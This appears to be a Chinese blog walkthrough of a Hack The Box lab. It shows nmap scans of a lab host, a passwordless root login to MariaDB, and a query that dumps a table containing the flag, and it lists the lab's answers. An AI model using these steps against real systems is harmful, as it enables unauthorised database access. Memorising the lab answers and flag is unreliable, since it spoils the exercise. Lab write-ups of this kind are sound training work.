HTB

HTB,第1张

⚔🌲 YOU NEED TO WALK BEFORE YOU CAN RUN 🌲⚔

文章目录
    • 先放答案
    • nmap 脚本
    • 如何连接数据库?

先放答案
Structured Query Language
3306
MariaDB
-u
root
*
;
nmap 脚本

日常扫描,使用 -A ,扫描了挺长一段时间,3306 端口开放了 MariaDB 数据库服务

┌──(root💀kali)-[~]
└─# nmap -A -T4 10.129.94.92
PORT     STATE SERVICE VERSION
3306/tcp open  mysql?
|_sslv2: ERROR: Script execution failed (use -d to debug)
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1

学一个新的参数 -sC ,这是代表使用一些默认脚本进行扫描,有用的结果并没有什么不同,也是数据库版本

┌──(root💀kali)-[~]
└─# nmap -sC -sV -T4 10.129.94.92 

nmap 的脚本是以 .nse 结尾的,可以在如下目录查看

┌──(root💀kali)-[~]
└─# ls /usr/share/nmap/scripts/ 

根据关键词搜索脚本,如 sql

┌──(root💀kali)-[~]
└─# ls /usr/share/nmap/scripts/ | grep sql

脚本的使用也很简单,使用帮助命令查看脚本说明文档,比如查看 ms-sql-ntlm-info.nse

┌──(root💀kali)-[~]
└─# nmap --script-help=ms-sql-ntlm-info

点击即可查看使用方法,应该不用教了

如何连接数据库?

回到靶机实验,因为提示了空密码,我们就不加 -p 参数了,使用命令行连接

┌──(root💀kali)-[~]
└─# mysql -u root -h 10.129.94.92 -D mysql
MariaDB [mysql]>

使用的话也和 mysql 一样

MariaDB [mysql]> show databases;
+--------------------+
| Database           |
+--------------------+
| htb                |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.294 sec)

查询数据,flag 就在第一个数据库第一个表里

MariaDB [mysql]> use htb;
MariaDB [htb]> show tables;
+---------------+
| Tables_in_htb |
+---------------+
| config        |
| users         |
+---------------+
MariaDB [htb]> select * from config;
+----+-----------------------+----------------------------------+
| id | name                  | value                            |
+----+-----------------------+----------------------------------+
|  1 | timeout               | 60s                              |
|  2 | security              | default                          |
|  3 | auto_logon            | false                            |
|  4 | max_size              | 2M                               |
|  5 | flag                  | 7b4bec00d1a39e3dd4e021ec3d915da8 |
|  6 | enable_uploads        | false                            |
|  7 | authentication_method | radius                           |
+----+-----------------------+----------------------------------+

pwn!😏

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/langs/893721.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-05-14
下一篇 2022-05-14

发表评论

登录后才能评论

评论列表(0条)

保存